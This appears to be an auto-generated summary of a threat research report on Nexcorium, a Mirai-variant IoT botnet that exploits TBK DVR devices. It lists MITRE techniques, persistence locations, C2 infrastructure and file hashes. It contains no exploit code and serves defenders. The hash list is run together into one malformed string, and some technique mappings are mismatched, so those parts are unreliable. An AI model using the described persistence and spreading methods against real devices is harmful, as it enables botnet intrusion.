Threat Research

Tracking Mirai Variant Nexcorium: A Vulnerability-Driven IoT Botnet Campaign

Fortinet
Tracking Mirai Variant Nexcorium: A Vulnerability-Driven IoT Botnet Campaign
FortiGuard Labs analyzed a campaign exploiting CVE-2024-3721 in TBK DVR-4104 and DVR-4216 devices to install the multi-architecture Mirai variant Nexcorium, which uses downloader scripts, persistence tricks, brute-force login attempts, and DDoS modules. The activity is likely linked to the suspected “Nexus Team” threat actor, identified by a custom X-Hacked-By header and infrastructure including r3brqw3d[.]b0ats[.]top. #CVE-2024-3721 #Nexcorium #NexusTeam #TBKDVR-4104 #TBKDVR-4216 #r3brqw3d.b0ats.top

Keypoints

  • FortiGuard Labs observed attackers exploiting CVE-2024-3721, an OS command injection flaw in TBK DVR devices.
  • The exploit delivered a downloader script named dvr that fetched Nexcorium samples for ARM, MIPS R3000, and x86-64 systems.
  • The campaign used a custom HTTP header, X-Hacked-By: Nexus Team – Exploited By Erratic, suggesting a likely link to the “Nexus Team” actor.
  • Nexcorium is a multi-module Mirai variant with watchdog, scanner, and attacker components, plus XOR-encoded configuration data.
  • The malware includes brute-force credentials, Telnet-based scanning/login behavior, and an exploit for CVE-2017-17215 targeting Huawei HG532 devices.
  • Persistence is achieved through /etc/inittab, /etc/rc.local, systemd service creation, crontab, and relocation to /usr/local/bin/sysd.
  • The botnet supports multiple DDoS attack modes and connects to the C2 domain r3brqw3d[.]b0ats[.]top to receive commands.

MITRE Techniques

  • [T1190 ] Exploit Public-Facing Application – The attackers gained initial access by exploiting the DVR command injection flaw in exposed devices. [‘exploiting CVE-2024-3721 … through manipulation of the mdb / mdc arguments’]
  • [T1059.004 ] Command and Scripting Interpreter: Unix Shell – A downloader script and later commands were executed on the victim device. [‘delivered a downloader script’, ‘executes commands to check if it gets a shell’]
  • [T1105 ] Ingress Tool Transfer – The downloader fetched malware samples from remote infrastructure. [‘fetches malware samples with filenames starting with nexuscorp’]
  • [T1027 ] Obfuscated Files or Information – The malware stored configuration and exploit material using XOR encoding. [‘XOR-Encoded configuration with the key 0x13’, ‘XOR-Encoded configuration with the key 0xFD’]
  • [T1053.003 ] Scheduled Task/Job: Cron – Nexcorium created a crontab entry to survive reboot. [‘It creates a scheduled task using crontab to ensure it runs after reboot’]
  • [T1053.006 ] Scheduled Task/Job: Systemd Service – The malware created a persistent systemd service. [‘creates a service file at /etc/systemd/system/persist.service, enabling it to run automatically at startup’]
  • [T1547.001 ] Registry Run Keys / Startup Folder – Not applicable; no registry, but startup persistence was achieved via init and startup scripts. [‘It updates /etc/inittab’, ‘It creates or updates /etc/rc.local’]
  • [T1057 ] Process Discovery – The malware checked running state and execution context, including subprocess role markers and shell validation. [‘uses the string NXS_WD_CHILD’, ‘including system, shell, sh, and cat /bin/busybox’]
  • [T1082 ] System Information Discovery – Nexcorium parsed victim architecture to ensure the right payload and behavior. [‘parse and verify the victim host’s architecture’]
  • [T1036 ] Masquerading – The malware copied itself to a benign-looking path and name for persistence. [‘copies itself to /usr/local/bin/sysd’]
  • [T1070.004 ] File Deletion – It removed its original binary to evade analysis. [‘The malware deletes its original binary from the current execution path’]
  • [T1110 ] Brute Force – The malware used a hard-coded username/password list and Telnet logins. [‘starts a brute-force attack using the previous wordlist’]
  • [T1498 ] Network Denial of Service – Nexcorium supported multiple flood-based DDoS attacks. [‘UDP flood, TCP ACK flood, TCP SYN flood … VSE query flood’]
  • [T1041 ] Exfiltration Over C2 Channel – The bot received commands from a command-and-control server over the network. [‘parses commands retrieved from the C2 server’]
  • [T1021.001 ] Remote Services: Telnet – Victim hosts opened Telnet connections for brute-force login attempts. [‘The malware scan involves the victim’s hosts opening a Telnet connection’]

Indicators of Compromise

  • [IP addresses ] C2/infrastructure and observed hosts – 84[.]200[.]87[.]36, 176[.]65[.]148[.]186, and other 1 item
  • [Domains ] command-and-control domain – r3brqw3d[.]b0ats[.]top
  • [File names ] downloader and malware samples – dvr, nexuscorp.x86
  • [File hashes ] detected samples in the report – 96aeb6321313919f0a41a520e6fa715450bbfb271a9add1e54efe16484a9c35, 37132e804ccb3fc4ba1f72205da70c3d7a6e66b43178707a9d8ee1156d815c21e4789416c35b345e75c023a8c07c207c79937c6a5444e1c29d85d18d2f660d8c0b510f93f47590791626d2fa74ddd62ba6eb8a5a5bb7b8476c0ceffc7be94ebe9b805585c457811d2c5c5664ede9ee869b53e3c9999100505d7ee8de7f855fdf95d1eb12d58206319c514c7240d058c512bb22b31f6ea22ed8be3ae44305c9f77c01d5b53861cd34e10a79fdea16dcf08bce9c78ed72abd6d6f3e9ce75a24734838e35b62a6b38675e467301166cdcc54f98d528fe43d56936caeffec88ac6962ccf23b8165e8c05899aa7ba4755b896ebf1d20d3b701cffdc768482486b0a7429404df12a7723ce46c8b199c88a808aa315dd8ff8fd1e06a34ccd3d16f4553bb1274de00a7f3d7ab9792ec3456e9d5bf057738666f34183f1d72060e2d4f678721c7cb2109ec97c14413cb8b58ddce0ecf0c1f13f22ee4f72eed79b57592cf589dae116c77b0035277d39dfe01043624427c119ddee8883a3ba54a42a6ae400
  • [Vulnerability IDs ] exploited and included exploit – CVE-2024-3721, CVE-2017-17215

Read more: https://feeds.fortinet.com/~/953946956/0/fortinet/blog/threat-research~Tracking-Mirai-Variant-Nexcorium-A-VulnerabilityDriven-IoT-Botnet-Campaign

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint